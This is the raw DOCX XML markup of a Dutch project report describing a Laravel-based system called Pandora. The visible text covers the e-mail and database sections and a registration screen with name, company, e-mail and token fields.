                    <w:p w14:paraId="57B20F3C" w14:textId="45C57126" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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Ri4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EhGUYuOAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAPdrvpHfAAAACgEAAA8AAAAAAAAAAAAAAAAA5gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1F210BFA" w14:textId="1FCA797D" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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53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Ey7edyOAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAB47wx7fAAAACgEAAA8AAAAAAAAAAAAAAAAA5gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="536647A6" w14:textId="7A53F7FD" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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Su44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PEokruOAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAOUPT/bfAAAACgEAAA8AAAAAAAAAAAAAAAAA5gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D88FC83" w14:textId="112D0BB4" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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SjI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S0j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N8GSjI0CAACOBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAHcLaRN8AAAAKAQAADwAAAAAAAAAAAAAAAADlBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="029004AA" w14:textId="29AB3D00" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6FB10490" w14:textId="52C49923" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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7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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="627CAEDE" w14:textId="7648861C" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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7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JA9mJ2OAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhALYYIjffAAAACgEAAA8AAAAAAAAAAAAAAAAA5gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FBD36E3" w14:textId="2069F6D2" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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KUx41o0CAACOBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEA2aSIe98AAAAKAQAADwAAAAAAAAAAAAAAAADlBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0E515D70" w14:textId="6E2C4ADF" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238"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JTfk7GOAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAKiUI5XfAAAACwEAAA8AAAAAAAAAAAAAAAAA5gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5F9160D7" w14:textId="6FDF8D61" w:rsidR="000E3238" w:rsidRDefault="000E3238"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DA01"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3542B"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02936"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sectPr w:rsidR="00E12294" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId80"/>
          <w:headerReference w:type="first" r:id="rId81"/>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09D39"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4" w:name="_Toc496292453"/>
      <w:r>
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="00E12294">
        <w:t>.5 E-Mail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>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82">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2E222"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241AB245"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9EB"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88304"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0E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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OgXo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675s7OhoWuo9tTnAN2uRC+va+rGjYh4LwItBzWQFh7v6NEGmpJDT3G2gfDzb/yE&#10;p5klKWcNLVvJ44+tCIoz88XRNH8cT6dpO/PPdPaeBoOFY8n6WOK29hKoL2M6LV5mMuHRDKQOYB/p&#10;LiyTVxIJJ8l3yXEgL7E7AXRXpFouM4j20Qu8cQ9eJtOpzmnWVu2jCL4fSKRJvoVhLcX8xVx22KTp&#10;YLlF0HUe2lTprqp9B2iX8yz3dycdi+P/jHq+jotf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nD5OgXoCAABlBQAA&#10;DgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEATTaynOAAAAAL&#10;AQAADwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="35366807" w14:textId="19C29DCB" w:rsidR="000E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238">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cJUnbHoCAABlBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAB+5Vz90AAAALAQAA&#10;DwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C509511" w14:textId="5E9995A3" w:rsidR="000E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Registratie</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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0E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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BSQobdegIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBZskQG3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="69BA2D54" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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ocHRRXoCAABlBQAA&#10;DgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAfUUm1eAAAAAL&#10;AQAADwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0420DDD7" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4CD031C4" w14:textId="5E3DEB9C" w:rsidR="000E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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iaXo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MIvYml6AgAAZQUAAA4A&#10;AAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhALhRNcHeAAAACwEA&#10;AA8AAAAAAAAAAAAAAAAA0gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADdBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5195B621" w14:textId="10CABD63" w:rsidR="000E3238" w:rsidRPr="00556CF7" w:rsidRDefault="000E3238"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70F0"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6BD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C6868"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0E3238" w:rsidRPr="00305920" w:rsidRDefault="000E3238">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8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AEEwOYiAIAAJEFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQDaL3694AAAAAsBAAAPAAAAAAAAAAAAAAAAAOAEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="55B25B72" w14:textId="1C796D36" w:rsidR="000E3238" w:rsidRPr="00305920" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Mailable</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CC4D5"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337A1"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E3DC8"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9781"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8340D"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7615"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E36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8E6D"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0E3238" w:rsidRPr="00D34083" w:rsidRDefault="000E3238">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8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DR&#10;473YhwIAAJEFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAA&#10;IQCXD+sE3gAAAAoBAAAPAAAAAAAAAAAAAAAAAN8EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQA&#10;BADzAAAA6gUAAAAA&#10;" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="203322E0" w14:textId="2600AE36" w:rsidR="000E3238" w:rsidRPr="00D34083" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Mail </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Facadé</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0E3238" w:rsidRPr="00D34083" w:rsidRDefault="000E3238">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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6A95E7B8" w14:textId="3C6015D6" w:rsidR="000E3238" w:rsidRPr="00D34083" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Laravel</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CF251"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bookmarkStart w:id="45" w:name="_Toc496292454"/>
    <w:p w14:paraId="32603974" w14:textId="47945B19" w:rsidR="005A7696" w:rsidRPr="00E7597A" w:rsidRDefault="00C552A1"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207DC4D3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-898760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-900430</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8744" id="Rectangle 801" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.75pt;margin-top:-70.8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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C710D1">
        <w:t xml:space="preserve">4.5.6 </w:t>
      </w:r>
      <w:r w:rsidR="005A7696" w:rsidRPr="00E7597A">
        <w:t>Database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="3088D81B" w14:textId="1BE55256"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169B460B" w:rsidR="00C86C1E" w:rsidRDefault="00FF4610">
      <w:r>
        <w:t>Tabel 4.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D260B5A" w14:textId="7A70FBE5" w:rsidR="00C86C1E" w:rsidRDefault="00C86C1E" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="428DDD8B" w14:textId="77777777" w:rsidR="00F03E20" w:rsidRDefault="00F03E20" w:rsidP="00C86C1E">
      <w:pPr>
        <w:sectPr w:rsidR="00F03E20" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId84"/>
          <w:headerReference w:type="first" r:id="rId85"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC08C23" w14:textId="74AA29B3" w:rsidR="004804BE" w:rsidRDefault="000464FF" w:rsidP="004804BE">
      <w:pPr>
        <w:ind w:left="-1417"/>
        <w:sectPr w:rsidR="004804BE" w:rsidSect="009404C6">
          <w:headerReference w:type="default" r:id="rId86"/>
          <w:headerReference w:type="first" r:id="rId87"/>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0E99A80F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-464185</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10732135" cy="9805487"/>
                <wp:effectExtent l="0" t="0" r="37465" b="24765"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21599"/>
                    <wp:lineTo x="21624" y="21599"/>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805487"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="BC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E115" id="Rectangle 519" o:spid="_x0000_s1026" style="position:absolute;margin-left:-36.55pt;margin-top:0;width:845.05pt;height:772.1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" fillcolor="#bc2422" strokecolor="#bb2422" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252917760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24CB4D5D" wp14:editId="6975A792">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>104140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>19494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916736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77A9BDB2" wp14:editId="1C97EB63">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>108585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1334135</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0E3238" w:rsidRPr="00A14BEE" w:rsidRDefault="000E3238"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91" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:8.55pt;margin-top:105.05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Ih3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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="74D4009C" w14:textId="2AF48ABA" w:rsidR="000E3238" w:rsidRPr="00A14BEE" w:rsidRDefault="000E3238"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677677" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27A3F386" wp14:editId="5AD1E26A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>118110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>248221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31CF3" id="Rounded Rectangle 591" o:spid="_x0000_s1026" style="position:absolute;margin-left:9.3pt;margin-top:195.45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2915712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B6CCAE2" wp14:editId="3F0EB994">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>239395</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>270700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0E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00EF79AD" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00CA4BC9" w:rsidRDefault="000E3238"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92" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18.85pt;margin-top:213.15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k+p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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6A799D75" w14:textId="569A94A1" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00EF79AD" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00CA4BC9" w:rsidRDefault="000E3238" w:rsidP="004804BE"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="46" w:name="_Toc496292455"/>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FFFEF"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6"/>
    </w:p>
    <w:p w14:paraId="27FDEBC8" w14:textId="2D55566E" w:rsidR="00E70EAE" w:rsidRDefault="00E70EAE" w:rsidP="00994238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc496292456"/>
      <w:r>
        <w:t>Introductie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>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941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2CF0"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0E3238" w:rsidRDefault="000E3238"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NaJEv58AgAAZQUA&#10;AA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAMkzrSrfAAAA&#10;CwEAAA8AAAAAAAAAAAAAAAAA1AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADgBQAA&#10;AAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="68FCCB77" w14:textId="017F3134" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">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rGqX3HoCAABlBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAbLxJjt0AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="247423EE" w14:textId="1F12546B" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238"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EDHwCAABl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CxfcQMfAIAAGUFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBVzqlC3QAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANQEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="50424763" w14:textId="2EF2CB82" w:rsidR="000E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238">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tI9uM3kCAABlBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAByx6+d4AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17D2A0C1" w14:textId="42BE6640" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="009B33B4" w:rsidRDefault="000E3238">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bHoCAABl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GVeVmx6AgAAZQUAAA4A&#10;AAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAB31xyPeAAAACwEA&#10;AA8AAAAAAAAAAAAAAAAA0gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADdBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5074EB07" w14:textId="6D90C850" w:rsidR="000E3238" w:rsidRPr="009B33B4" w:rsidRDefault="000E3238">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B33B4">
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Artisan</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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C638A"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2355"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A33E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bookmarkStart w:id="48" w:name="_Toc496292457"/>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F35D8"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8"/>
    </w:p>
    <w:p w14:paraId="79E3B86B" w14:textId="77777777" w:rsidR="00FB14D3" w:rsidRDefault="00FB14D3" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="1177E489" w14:textId="2CAAFBA3" w:rsidR="00913071" w:rsidRDefault="00FB14D3" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc496292458"/>
      <w:r w:rsidRPr="00FB14D3">
        <w:t>Registratie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>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91">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0E3238" w:rsidRDefault="000E3238">
                            <w:r>
                              <w:t>Dit is het registratiescherm van Pandora. Wanneer een gebruiker de extensie voor het eerst gebruikt krijgt hij dit scherm voor zich. Wanneer alle velden zijn ingevuld dient de gebruiker op de knop “registreer” te drukken.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="600A8DF3" w14:textId="0FF4983E" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00C00F2D">
                            <w:r>
                              <w:t>Het formulier bestaat uit de velden:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35814AC1" w14:textId="0BB99F4C" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Naam</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5AB5CE56" w14:textId="689FF58A" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Bedrijf</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6B20E938" w14:textId="7A8BF6FC" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>E-mail</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5B9B940F" w14:textId="1C92CE8D" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Token</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="668F2532" w14:textId="1FEF5342" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00E469F7">
                            <w:r>
                              <w:t>De eerste 3 velden zijn begrijpelijk maar het veld Token heeft wat uitleg nodig.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="01F13F9B" w14:textId="7089D236" w:rsidR="000E3238" w:rsidRDefault="000E3238"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9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Dgx9pqjAIAAI8FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQBxFMGU3wAAAAcBAAAPAAAAAAAAAAAAAAAAAOQEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C64D62C" w14:textId="3FB65965" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t>Dit is het registratiescherm van Pandora. Wanneer een gebruiker de extensie voor het eerst gebruikt krijgt hij dit scherm voor zich. Wanneer alle velden zijn ingevuld dient de gebruiker op de knop “registreer” te drukken.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="600A8DF3" w14:textId="0FF4983E" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00C00F2D">
                      <w:r>
                        <w:t>Het formulier bestaat uit de velden:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="35814AC1" w14:textId="0BB99F4C" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Naam</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5AB5CE56" w14:textId="689FF58A" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Bedrijf</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6B20E938" w14:textId="7A8BF6FC" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>E-mail</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5B9B940F" w14:textId="1C92CE8D" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Token</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="668F2532" w14:textId="1FEF5342" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00E469F7">
                      <w:r>
                        <w:t>De eerste 3 velden zijn begrijpelijk maar het veld Token heeft wat uitleg nodig.</w:t>
                      </w:r>
                    </w:p>
